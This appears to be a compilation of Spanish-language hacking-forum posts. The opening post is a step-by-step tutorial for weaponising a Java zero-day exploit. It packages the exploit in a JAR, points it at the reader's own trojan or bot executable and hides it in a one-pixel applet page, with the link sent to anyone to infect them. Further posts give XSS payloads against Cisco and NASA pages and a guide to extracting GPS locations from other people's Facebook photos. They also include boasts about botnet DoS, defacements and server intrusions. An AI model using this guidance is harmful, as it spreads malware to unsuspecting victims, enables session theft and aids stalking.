Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.

En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.

Empecemos.

Descargamos el Exploit:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login 
Pass: calebbucker

Necesitaremos el Programa Eclipse: 
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Disponible 32 y 64 bits, descargue dependiendo de su S.O

Instalamos JAVA 7: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Iniciamos Eclipse, seleccionamos File - Import:


Seleccionamos General - Proyectos Existentes en el Área de Trabajo:


Le damos Next, ahora click en Browser y seleccionamos la ruta del exploit descomprimido, en mi caso es C:\Documents and Settings\TioSam\Escritorio\exploit2


Seleccionamos Finish, ahora en el proyecto importado, abrimos el archivo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y editamos la linea URL website = new URL("DOWNLOADPATH"); en DOWNLOADPATCH colocaremos la url de nuestro exe (bot, troyano) la cual quedaria: URL website = new URL("You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login");


Ahora, abrimos el archivo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y le damos RUN, si el archivo logra abrir entonces quiere decir que todo funciona bien; si no abre compruebe que tiene JAVA 7 instalado.


Ahora, exportamos el Proyecto, click derecho sobre exploit2 y seleccionamos Export:


El proyecto tiene que ser guardado en formato JAR, por lo tanto seleccionamos Java - Jar file:


Seleccionamos Next, ahora click en Browser y seleccionamos la carpeta donde se guardara el archivo Jar en mi caso es: C:\Documents and Settings\TioSam\Escritorio\TEST\test.jar


Terminado ese paso le damos Next, Next y Finish.

Ahora, creamos un archivo html con el siguiente código:

<html><head></head><body><applet archive="JARNOMBRE.jar" code="applet1.class" width="1" height="1"></applet></body></html>

En mi caso el codigo queda de la siguiente manera:

<html><head></head><body><applet archive="test.jar" code="applet1.class" width="1" height="1"></applet></body></html>

Esos archivos la subimos en nuestro Host el test.jar, index.html y applet1.class, de preferencia de pago.

Ahora solo queda enviar el link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a cualquier persona.

En este caso, he configurado una Botnet (Aldi) la cual al momento que abri dicho link quede infectado


Esta vulnerabilidad también puede ser explotada desde Metasploit:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Espero no sean tan "ingenuos" en abrir cualquier link que le envian, por lo menos tengan desactivado JAVA hasta que salga el respectivo parche.

Saludos.

PARCHE: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un XSS de hace meses en Cisco:



POC:

http://developer.cisco.com/web/axl/wikidocs?p_p_id=1_WAR_wikinavigationportlet_INSTANCE_i9JW&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&p_r_p_185834411_nodeId=803208&p_r_p_185834411_title="><script>alert(TioSamCL-Security)</script>

Status: FIXED

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
disculpa pero persistente son los css en los cuales se inyecta el codigo y keda activo en el sitio sin tener ke poner la url con el codigo o mandando con dom, como en guestbooks ke dejas un comntario con un xss y el admin o kien lo vea se ejecuta el codigo sin tener ke mandarle la url con modificacion en ella :3

Tratas de decir que los XSS Persistentes son cuando un atacante inyecta el code javascript y queda grabado en el sitio? EPIC FAIL -_-

No compares un Modulo con un guestbooks, las cuales estan programadas para que cualquiera que lo vea, pueda leer el code.

Como te vuelvo a repetir, lo considero Persistente porque pude hacer pruebas mediante otro servidor para obtener una session y otras cosas mas.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
solo un pekeño detalle
esos no son xss persistentes :3

Lo considero PERSISTENTE, porque antes que sea REPORTADA, pude hacer muchas cosas, cosa que con el NO PERSISTENTE no se puede llegar hacer.

La de Peruvian tambien tiene una igual

Buscando marcianos jajajaja (broma)

1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                                                                        1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|              NASA.GOV - Cross Site Scripting Persistent                |
--------------------------------------------------------------------------
# Exploit Title : NASA Curiosity - Cross Site Scripting Persistent
# Date          : 21-08-2012
# Author        : Caleb Bucker (Independent Security Researcher)
# Vendor        : NASA
# Category      : misc
# URL Vendor    : http://www.nasa.gov/
# Tested on     : BackTrack 5 r3 - Mozilla Firefox
# Contact       : [email protected]
# Website       : www.calebbucker.blogspot.com
# Greetings to  : CL-Security All Members And Friend's
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCREENSHOT:
 
http://img341.imageshack.us/img341/4395/snapshot408.png
 
http://img837.imageshack.us/img837/7151/snapshot409.png
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
VULNERABILITY LOCATION:
 
www.nasa.gov/mission_pages/msl/news/msl20120817.html[code]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
CROSS SITE SCRIPTING:
 
www.nasa.gov/mission_pages/msl/news/msl20120817.html"><script>alert('CalebBucker')</script> %2522%253E%253Cscript%253Ealert%2528%2527CalebBucker%2527%2529%253C%252fscript%253E
 
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
HOW TO USE:
 
"><script>alert('XSS")</script> send it through, works on GET nothing else is really special about it.
 
so double encoded it will look like this:
 
%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252fscript%253E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
Enjoy!
 
# 1337day.com [2012-08-22]

En esta entrada, mostraré cómo extraer los Metadatos de las Fotografías para saber el lugar exacto de ubicación donde se tomo la Fotografía.

Hay que tener en cuenta que no todas las Fotografías tienen datos GPS. La mayoría de las fotos que existen con estos datos, son tomadas desde teléfonos inteligentes y/o cámaras de ultima generación.

Sin embargo, muchas personas que cuentan con estos teléfonos, no tienen conocimiento sobre la opción GPS, por lo que simplemente no saben que esta encendido al momento de tomar una Fotografía.

También resaltar que este método es utilizado para resolver muchos "crímenes" porque realizando un Análisis Forense de una Fotografía, se puede obtener los datos REALES y EXACTOS del momento, fecha, hora, ubicación, nombre de la cámara, fecha de edición si la imagen ha sido editada y todas las demás opciones puestas en ella, llegando así a obtener un resultado real.

¿Qué son los metadatos?

Metadatos en pocas palabras es decir, los datos acerca de los datos, por ejemplo cuando se toma una fotografía, se obtiene una gran cantidad de datos, como qué tipo de cámara tome la foto, la hora y fecha en que fue tomada etc...

Ahora bien, para realizar este método, usaremos la herramienta EXIFTOOL que esta disponible tanto para Linux como para Windows.

En BackTrack podemos encontrarla en la siguiente dirección:

Aplicaciones - BackTrack - Forensics - Forensics Analysis Tools - Exiftool

Si aun no la tenes, podes descargarla desde el siguiente link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Descomprimen el archivo Exiftool en una carpeta preferida, abren la terminal y vamos a la carpeta exiftool.

INSTALACIÓN:

• perl You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• make
• make install
• ./exiftool

Teniendo todo listo, creamos una carpeta donde ira la imagen que deseamos extraer los metadatos, en este caso yo he creado una carpeta en root con el nombre images, asegurese de conocer bien la ruta.

La imagen que voy a utilizar se llama fotografia.jpg la cual esta en la carpeta images.

La ruta seria: ~/images/fotografia.jpg

Ahora, en la terminal de exiftool tecleamos el siguiente comando:

./exiftool -a ~/images/fotografia.jpg

La cual nos arroja los siguientes datos:

Se puede observar muchos datos, como la fecha y hora que se tomo la imagen y todo lo demas que mencione lineas arriba, ademas de que la foto fue tomada desde un SAMSUNG.

En este caso, queremos saber la ubicacion de donde fue tomada la fotografia, por lo que copiaremos los datos GPS, la cual son los siguientes:

• GPS Latitude: 42 deg 24' 54.91" N
• GPS Longitude: 83 deg 25' 21.36" W
• GPS Position : 42 deg 24' 54.91" N, 83 deg 25' 21.36" W

Entonces, nos dirigimos a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login e introducimos las coordenadas.

• GPS Position : 42 deg 24' 54.91" N, 83 deg 25' 21.36" W

¿Por qué no funciona? Bueno, en primer lugar tenemos que tener algunas cosas claras, por ejemplo:

Las coordenadas son:

• 42 deg 24' 54.91" N, 83 deg 25' 21.36" W

Entonces, tenemos que quitar todo el ' " , N W y poner - entre el medio de las coordenadas, por lo que quedaría así:

• 42 24 54.91 - 83 25 21.36

Ahora, esas coordenadas las introducimos en Google Maps y nos dará la ubicación exacta.



Como podemos apreciar, esta Fotografía fue tomada en  Laurel Park Dr Livonia, MI 48152, EE.UU

Una cosa divertida de hacer esto es tomar fotos desde Facebook y utilizar este método para encontrar las Coordenadas GPS.

Que se diviertan!

Saludos.

Muy buen video arthusu.

Yo me demore algo de 7 a 12 minutos para solucionar todo el reto.... y el tiempo que nos hemos demorado es muy bueno... no como otras personas que desde que salio el reto hasta antes que postees tu video, no llegaron a obtener una simple frase.

El tiempo que nos hayamos demorado no importa, la cosa es que fue solucionado tal cual es.

Saludos y muy buen reto 

Usa Exploit Kit's y problema solucionado.

Abres los port's mas conocidos con vulnerabilidades y lanzas el exploit.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Haber niñito.
Tu SUPER MEGA ARCHI TUTORIAL es lo mismo que yo hice en mi video.
Si vos decis que no se puede entrar a una web que esta en root desde una web... PUES yo si lo puedo hacer y lo he hecho muchas veces.
YO NO DEFACEO, SOLO ENTRO A LOS SERVIDORES A DEJAR UNOS ARCHIVOS QUE ME INTERESA.

PD: REVISANDO UN POCO EN GOOGLE SOBRE TU NICK.. VOS SOS DE MxSoftTeam? LOS NIÑATOS QUE DEFACEAN PAGINAS WEBS DE PANADERIAS Y FERRETERIAS OBTENIDA POR SYMLINK? 

PD2: TU AMIGUITO OKOL TE DIJO QUE VOS RESPONDAS PORQUE EL NO PUEDE? JAJAJA ESTOS DEFACERS DE SQL INYECTION CADA DIA DAN MAS RISA XDDDDDD

Congratz sabes usar google por lo menos se me hara menos dificultoso explicarte jajajaj niñato? creo que se mas que vos no por andar hablando y diciendo mamadas vos sos tiosam de cyberlocas? los lammersillos si me vienes a decir ami sales perdiendo jajaja panaderias y ferreterias ? si como no sigue pensando que son por symlink sorry por destruirte por tus sueños que descubrieron cosas de la nasa? cuando lo hizo failroot y members de metalsoft? ups creo que ya lo habia dicho como antes que se creen hackers doseando servidores con bonets presumiendo cosas que no saben? si revisas un poco mas en GOOGLE sabras de donde provengo y cuales son mis procedencias o si no preguntaselo a tu amigo OKOL porque si te das cuenta no solo te dije a ti si no a el tambien uno por equivocarse y otro por confundir.

PD:Si te pones a revisar mi zone-h y webs defaceadas no todas fueron son inyecciones sql ni symlink quemate el coco si es que sabes ahi nos leemos juacker de cyberlocas jajaja ftps de la nasa by cyberlocas ? xD sorry si me sali del post solo que estos LAMMERSILLOS me dan risa...

ah otra cosa por un symlink no puedes entrar a otra web siendo root si estoy equivocado muestralo en video o si no que otra persona lo diga. con hechos...

ah se me olvida preguntale a okol bien de mi y hablas tenemos diferentes niveles de conocimientos jajaja, un verdadero informatico no depende del sistema que maneje puede user windows, linux, unix etc porque el verdadero puede desenvolverse en cualquier sistema operativo jaja siguete defendiendo que me sigo riendo jajaja deberias revisar mas haya que no solo soy de mxsoftteam jajaja....

En mi blog podes ver cuando ingrese a la NASA, si vos decis que lo copie pues quiero que muestres una imagen o algo donde FailRoot o alguien de MetalSoftTeam diga que yo los copie.

Al menos abre tus ojitos y lee bien, el bug que encontre en uno de los SUBDOMINIOS de la NASA fue un SQL Injection la cual me permitio ingresar a su DB   e inmediatamente la reporte.

Yo no doseo con BOTNETS, no soy como vos que usas tu windows y tu troyanito para dosear webs...
En estos tiempos yo solo presiono CLICK y off cualquier sitio web.

El DEFACE es para personas que no tienen Ethica en ninguna rama del Hacking asi que tu zone-h me lo paso por los eggs.

Sobre el symlink.. se nota que aun no sabes ni bypassear algunos filtros es por eso que vos decis que no se puede llegar a ser root.

PD: SI SOS DE "NIVEL" COMO DECIS.. NO ENTIENDO PORQUE ANDAS DEFACEANDO WEBS DE PANADERIAS Y FERRETERIAS CON TU AMIGO EL GORDO OKOL...

Haber niñito.
Tu SUPER MEGA ARCHI TUTORIAL es lo mismo que yo hice en mi video.
Si vos decis que no se puede entrar a una web que esta en root desde una web... PUES yo si lo puedo hacer y lo he hecho muchas veces.
YO NO DEFACEO, SOLO ENTRO A LOS SERVIDORES A DEJAR UNOS ARCHIVOS QUE ME INTERESA.

PD: REVISANDO UN POCO EN GOOGLE SOBRE TU NICK.. VOS SOS DE MxSoftTeam? LOS NIÑATOS QUE DEFACEAN PAGINAS WEBS DE PANADERIAS Y FERRETERIAS OBTENIDA POR SYMLINK? 

PD2: TU AMIGUITO OKOL TE DIJO QUE VOS RESPONDAS PORQUE EL NO PUEDE? JAJAJA ESTOS DEFACERS DE SQL INYECTION CADA DIA DAN MAS RISA XDDDDDD

MXSOFTTEAM DEFACEANDO WEBS DE PANADERIAS Y FERRETERIAS:


WINDEROS DETECTED

Para vos no, para mi SI.

Xelenium es una herramienta de pruebas de seguridad que se puede utilizar para identificar las vulnerabilidades de seguridad presentes en la aplicación web.

Xelenium utiliza el código abierto de automatización de pruebas funcionales de herramientas "Selenium", como su motor y ha sido construido usando Java Swing.

Esta versión ayuda al usuario en la identificación de la vulnerabilidad Cross Site Scripting (XSS) y las amenazas presentes en la aplicación web. En la versión posterior, Xelenium se verá reforzada de tal manera que se podrían identificar las principales vulnerabilidades.

Descargamos la herramienta: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Como esta programada en Java, en la consola tenemos que colocar el siguiente comando:

java -jar Xelenium.jar

Y se abrirá la interfaz gráfica:


La forma en que funciona esta herramienta es muy fácil, solo tenemos que colocar el sitio web que queramos auditar en "Enter URL", presionamos en "Capture Pages"  y esperamos a que la herramienta cargue los módulos del sitio web.

Terminado dicho proceso, presionamos click en "Perfom XSS Scan" por lo que la herramienta inyectara los códigos Javascript para encontrar las vulnerabilidades XSS.


Espero les sirva.

Saludos.

Hola,

Si te refieres a la PARTICIÓN de los discos, debes al menos dejar unos 50 GB de espacio libre para que puedas instalar el BackTrack sin problemas.
Para ello debes utilizar el programa Partition_Wizard_Professional_Edition _5.0 descargándola desde aquí:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Instalas el programa, a tu disco D: o C: le quitas algunos GB, y como te vuelvo a repetir, debes al menos dejar unos 50GB de espacio libre.

Teniendo los 50GB de espacio libre, en las opciones de la instalacion del BackTrack seleccionas: INSTALAR BACKTRACK UTILIZANDO ESPACIO LIBRE EN DISCO.
Y asi lo instalaras sin problemas, teniendo el Windows y el BackTrack a seleccionar cuando inicias tu PC.

A mi me sirvió, espero te sirva a vos.

Saludos.

Vega es un escáner de Vulnerabilidades de código abierto para probar la seguridad de aplicaciones web, en la cual puede ayudarle a encontrar y validar las Inyecciones SQL, Cross-Site Scripting (XSS), Shell Injection, Local File Inclusion, Integer Overflow y otras vulnerabilidades.

Está programada en Java y basado en una interfaz gráfica por la cual se puede ejecutar en Linux, OS X y Windows.

Vega incluye un escáner automatizado para pruebas rápidas y también un Proxy para proteger nuestra IP cuando realizamos alguna auditoria web.

Vega fue desarrollado por Subgraph en Montreal.

Actualmente esta herramienta viene incorporada en el BackTrack a partir de la version R1 y R2.

Ubicación:

Aplicaciones - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - Vega

Abriendo desde la Consola/Terminal


Interfaz Gráfica de la Herramienta:





Simple Test:


Si aun no tenes esta herramienta en tu Sistema Operativo, visita el sitio oficial del proyecto en la cual podrás descargar y leer mas sobre esta maravillosa herramienta.

Sitio Oficial: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Demostracion:

Saludos.

Descargate la ultima version....
No tenes porque compilar nada, solo descargas, descomprimes y lanzas la herrramienta:

perl uniscan.pl

Si te sale el mismo error, actualiza las dependencias de perl.

El MSF no conecta con el SET, porque de seguro las versiones no son compatibles.

En la terminal/consola teclea lo siguiente:

apt-get upgrade

Esperas a que actualize, reinicias e intentas lanzar nuevamente el SET.

Hay Dios mio...

Es lógico que te va a mostrar la IP de google si es de gmail, pero te dije que busques la linea que te mencione!!!
Bueno ahi ves, a mi si me funciona.